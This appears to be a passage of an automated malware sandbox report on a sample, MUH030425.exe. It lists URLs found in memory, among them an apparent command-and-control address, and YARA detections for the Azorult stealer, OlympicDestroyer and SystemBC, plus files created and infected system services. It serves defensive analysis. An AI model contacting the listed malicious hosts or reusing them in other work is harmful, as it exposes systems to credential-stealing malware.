              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: MUH030425.exeString found in binary or memory: http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn
              Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1603192431.0000000003330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://k1d5.icu/TP341/index.php
              Source: RegSvcs.exe, 00000008.00000002.1603192431.0000000003330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://k1d5.icu/TP341/index.phph
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: MUH030425.exe, 00000000.00000002.1686714780.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNzB8fHx8fHw2N2M2YmI1NjUxOD
              Source: alg.exe, 0000000D.00000003.1955019744.0000000000545000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2107290818.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2118070130.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1967145828.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2047366590.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/xrkixnpk?usid=18&utid=30152687444
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz:80/xrkixnpk?usid=18&utid=30152687444Pn:
              Source: alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTV8fHx8fHw2N2M2YmIyZDM4
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/cygwkoswoy?usid=18&utid=30152678086
              Source: alg.exe, 0000000D.00000003.1878733120.0000000000521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/gedtsq?usid=18&utid=30152678479
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892690377.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1543980844.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1553956256.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz:80/gedtsq?usid=18&utid=30152678479
              Source: alg.exe, 0000000D.00000003.1955019744.0000000000545000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2107290818.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2118070130.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1967145828.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2047366590.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz/yhikx?usid=18&utid=30152687280
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944621326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz:80/yhikx?usid=18&utid=30152687280P
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/b?usid=18&utid=30152678348
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/b?usid=18&utid=30152678348Sje
              Source: alg.exe, 0000000D.00000003.1555833531.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576172278.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790563475.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1838038969.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798846224.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1908959853.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1797899601.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907606835.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1572794877.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892475238.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/en?usid=18&utid=30152678739
              Source: alg.exe, 0000000D.00000003.1553956256.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz:80/en?usid=18&utid=30152678739P
              Source: alg.exe, 0000000D.00000003.2270507357.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/
              Source: alg.exe, 0000000D.00000003.2270739736.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/8
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
              Source: alg.exe, 0000000D.00000003.1636988813.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: alg.exe, 0000000D.00000003.2112196038.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
              Source: alg.exe, 0000000D.00000003.2038996262.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
              Source: alg.exe, 0000000D.00000003.2038996262.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report..
              Source: alg.exe, 0000000D.00000003.1695292605.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
              Source: alg.exe, 0000000D.00000003.1695827522.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1695966946.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: alg.exe, 0000000D.00000003.2112271794.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
              Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1543338864.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1954786173.0000000001510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://euob.seaskydvd.com/sxp/i/224f85302aa2b6ec30aac9a85da2cbf9.js
              Source: alg.exe, 0000000D.00000003.2095233929.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
              Source: alg.exe, 0000000D.00000003.2095233929.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
              Source: setup.exe1.13.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: setup.exe1.13.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: alg.exe, 0000000D.00000003.2112343455.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
              Source: alg.exe, 0000000D.00000003.2112343455.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
              Source: alg.exe, 0000000D.00000003.2095519854.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
              Source: alg.exe, 0000000D.00000003.2111979719.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1601150507.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033ws
              Source: RegSvcs.exe, 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfic
              Source: RegSvcs.exe, 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.sr8
              Source: RegSvcs.exe, 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1954786173.0000000001510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=fwiwk.biz
              Source: alg.exe, 0000000D.00000003.1543338864.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
              Source: alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/munin/a/tr/click
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trkpcna.net/munin/a/tr/click
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001253000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.0000000000545000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2107290818.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2118070130.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1967145828.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1555956968.000000000052F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1552930830.0000000000532000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2047366590.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1572794877.0000000000532000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.0000000000546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
              Source: 8.2.RegSvcs.exe.4eee249.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\eab56394c76d7db5.bin
              Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C27B718_2_02C27B71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C600D98_2_02C600D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C251EE8_2_02C251EE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C559808_2_02C55980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C26EAF8_2_02C26EAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C639A38_2_02C639A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C6515C8_2_02C6515C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C5C7F08_2_02C5C7F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C27F808_2_02C27F80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C537808_2_02C53780
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C5D5808_2_02C5D580
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B9A81017_2_00B9A810
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B77C0017_2_00B77C00
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B779F017_2_00B779F0
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00BA2D4017_2_00BA2D40
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B9EEB017_2_00B9EEB0
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B992A017_2_00B992A0
              Source: C:\Windows\System32\AppVClient.exeCode function: 17_2_00B993B017_2_00B993B0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_00427C0021_2_00427C00
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_0044A81021_2_0044A810
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_00452D4021_2_00452D40
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_004279F021_2_004279F0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_004492A021_2_004492A0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_0044EEB021_2_0044EEB0
              Source: C:\Windows\System32\FXSSVC.exeCode function: 21_2_004493B021_2_004493B0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009BA81022_2_009BA810
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_00997C0022_2_00997C00
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009979F022_2_009979F0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009C2D4022_2_009C2D40
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009BEEB022_2_009BEEB0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009B92A022_2_009B92A0
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 22_2_009B93B022_2_009B93B0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C07C0023_2_00C07C00
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C2A81023_2_00C2A810
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C079F023_2_00C079F0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C32D4023_2_00C32D40
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C292A023_2_00C292A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C2EEB023_2_00C2EEB0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 23_2_00C293B023_2_00C293B0
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00C97C0024_2_00C97C00
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00CBA81024_2_00CBA810
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00C979F024_2_00C979F0
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00CC2D4024_2_00CC2D40
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00CB92A024_2_00CB92A0
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00CBEEB024_2_00CBEEB0
              Source: C:\Windows\System32\msdtc.exeCode function: 24_2_00CB93B024_2_00CB93B0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004C7C0025_2_004C7C00
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004EA81025_2_004EA810
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004F2D4025_2_004F2D40
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004C79F025_2_004C79F0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004E92A025_2_004E92A0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004EEEB025_2_004EEEB0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 25_2_004E93B025_2_004E93B0
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_0076A81027_2_0076A810
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_00747C0027_2_00747C00
              Source: C:\Windows\System32\Locator.exeCode function: 27_2_00772D4027_2_00772D40
